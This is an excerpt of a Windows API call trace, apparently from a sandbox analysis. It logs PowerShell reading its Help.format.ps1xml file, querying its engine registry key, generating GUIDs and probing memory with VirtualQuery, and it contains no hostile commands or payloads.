	[0285.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0285.260] SetErrorMode (uMode=0x1) returned 0x1
	[0285.260] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1d0
	[0285.261] GetFileType (hFile=0x1d0) returned 0x1
	[0285.261] SetErrorMode (uMode=0x1) returned 0x1
	[0285.261] GetFileType (hFile=0x1d0) returned 0x1
	[0285.261] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.261] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.261] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.261] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.262] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.262] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.262] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.262] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.263] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.263] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.264] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.264] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0285.264] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.014] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.014] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.014] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.015] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.015] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.016] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.016] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.016] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.016] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.017] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.017] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.017] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.017] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.018] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.018] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.018] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.018] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.018] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.019] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.021] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.021] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.021] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.021] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.022] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.022] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.022] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.022] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.022] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.023] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.023] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.023] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.023] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.023] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.023] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.024] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.025] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.025] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.025] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.025] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.025] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.025] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.026] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x1000, lpOverlapped=0x0) returned 1
	[0286.026] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0xf37, lpOverlapped=0x0) returned 1
	[0286.026] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9d1bf, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9d1bf*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0286.026] ReadFile (in: hFile=0x1d0, lpBuffer=0x2e9db20, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d258, lpOverlapped=0x0 | out: lpBuffer=0x2e9db20*, lpNumberOfBytesRead=0x12d258*=0x0, lpOverlapped=0x0) returned 1
	[0286.026] CloseHandle (hObject=0x1d0) returned 1
	[0286.026] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0286.026] SetErrorMode (uMode=0x1) returned 0x1
	[0286.026] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d200 | out: lpFileInformation=0x12d200*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0286.027] SetErrorMode (uMode=0x1) returned 0x1
	[0286.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0286.027] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d2e8 | out: phkResult=0x12d2e8*=0x1d0) returned 0x0
	[0286.027] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d26c, lpData=0x0, lpcbData=0x12d268*=0x0 | out: lpType=0x12d26c*=0x1, lpData=0x0, lpcbData=0x12d268*=0x56) returned 0x0
	[0286.027] CoTaskMemAlloc (cb=0x5a) returned 0x37ed30
	[0286.027] RegQueryValueExW (in: hKey=0x1d0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d23c, lpData=0x37ed30, lpcbData=0x12d238*=0x56 | out: lpType=0x12d23c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d238*=0x56) returned 0x0
	[0286.027] CoTaskMemFree (pv=0x37ed30) 
	[0286.027] RegCloseKey (hKey=0x1d0) returned 0x0
	[0286.027] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cf30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0286.028] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0286.032] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0x33320c45, Data2=0xde46, Data3=0x47b0, Data4=([0]=0x8f, [1]=0x6c, [2]=0xf4, [3]=0xa9, [4]=0x75, [5]=0x29, [6]=0x1b, [7]=0x4f))) returned 0x0
	[0286.032] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xe385367f, Data2=0xb79e, Data3=0x4869, Data4=([0]=0x99, [1]=0xb5, [2]=0xac, [3]=0xc6, [4]=0x9c, [5]=0x6, [6]=0x88, [7]=0xa9))) returned 0x0
	[0286.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.033] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0286.812] CoCreateGuid (in: pguid=0x12d510 | out: pguid=0x12d510*(Data1=0xde981092, Data2=0x5bbf, Data3=0x48ed, Data4=([0]=0x9f, [1]=0x6d, [2]=0x65, [3]=0xc3, [4]=0xd3, [5]=0x0, [6]=0x45, [7]=0x8e))) returned 0x0
	[0286.813] VirtualQuery (in: lpAddress=0x12b520, lpBuffer=0x12c3e0, dwLength=0x30 | out: lpBuffer=0x12c3e0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.814] VirtualQuery (in: lpAddress=0x12b5b0, lpBuffer=0x12c470, dwLength=0x30 | out: lpBuffer=0x12c470*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.815] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.816] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.817] VirtualQuery (in: lpAddress=0x12bd30, lpBuffer=0x12cbf0, dwLength=0x30 | out: lpBuffer=0x12cbf0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.819] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.819] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bc90, lpBuffer=0x12cb50, dwLength=0x30 | out: lpBuffer=0x12cb50*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0286.820] VirtualQuery (in: lpAddress=0x12bd20, lpBuffer=0x12cbe0, dwLength=0x30 | out: lpBuffer=0x12cbe0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
